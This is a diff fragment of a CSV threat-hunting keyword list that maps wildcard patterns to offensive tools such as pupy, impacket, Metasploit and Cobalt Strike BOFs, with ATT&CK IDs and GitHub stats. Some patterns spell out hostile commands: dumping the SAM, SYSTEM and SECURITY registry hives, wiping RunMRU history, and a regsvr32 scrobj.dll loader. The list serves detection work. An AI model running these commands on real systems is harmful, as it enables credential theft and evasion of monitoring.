","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*RefleXXion*ntdll.dll*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion.sln*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. 
In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion-DLL*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion-EXE*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion-main*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. 
NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*REG ADD *igfxCUIService*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f*","offensive_tool_keyword","reg","Delete run box history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*reg save hklm\sam 1337*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*reg save hklm\system 1337*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va 
/f*","offensive_tool_keyword","reg","Delete run box history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*reg save hklm\sam 1337*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*reg save hklm\system 1337*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*reg.exe save HKLM\SAM sam_*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*reg.exe save hklm\sam*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*reg.exe save HKLM\SECURITY security_*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control 
server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" 
@@ -15742,64 +15921,65 @@
 "*reGeorg-master*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z"
 "*reGeorgSocksProxy.py*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z"
 "*register-python-argcomplete --no-defaults exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*registry_hijacking_eventvwr*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
-"*registry_hijacking_fodhelper*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*registry_hijacking_eventvwr*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*registry_hijacking_fodhelper*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
 "*RegistryImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
-"*registry-read.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*registry-read.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
 "*RegistryTinker.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
-"*RegReeper.7z*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
-"*RegReeper.cpp*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
-"*RegReeper.exe*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
-"*RegReeper.sln*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
-"*RegReeper.vcxproj*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
-"*Reg-Restore-Persistence-Mole-main*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
+"*RegReeper.7z*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
+"*RegReeper.cpp*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
+"*RegReeper.exe*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
+"*RegReeper.sln*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
+"*RegReeper.vcxproj*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
+"*Reg-Restore-Persistence-Mole-main*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
 "*regsvr32.exe /s /n /u /i: * scrobj.dll*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
-"*regsvr32_command_delivery_server*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*reinstall_original_pw.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","555","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z"
+"*regsvr32_command_delivery_server*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*reinstall_original_pw.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","556","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z"
 "*rekallreader.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
-"*relay*/utils/enum.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
-"*RelayPackets.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
-"*Release of BloodHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z"
-"*REM Title: Harvester_OF_SORROW*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
-"*remiflavien1/recon-archy*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","12","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z"
+"*relay*/utils/enum.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*RelayPackets.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*Release of BloodHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*REM Title: Harvester_OF_SORROW*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*remiflavien1/recon-archy*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z"
 "*-remote -destPipe * -pipeHost * -destHost *","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z"
-"*Remote/lastpass/lastpass.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
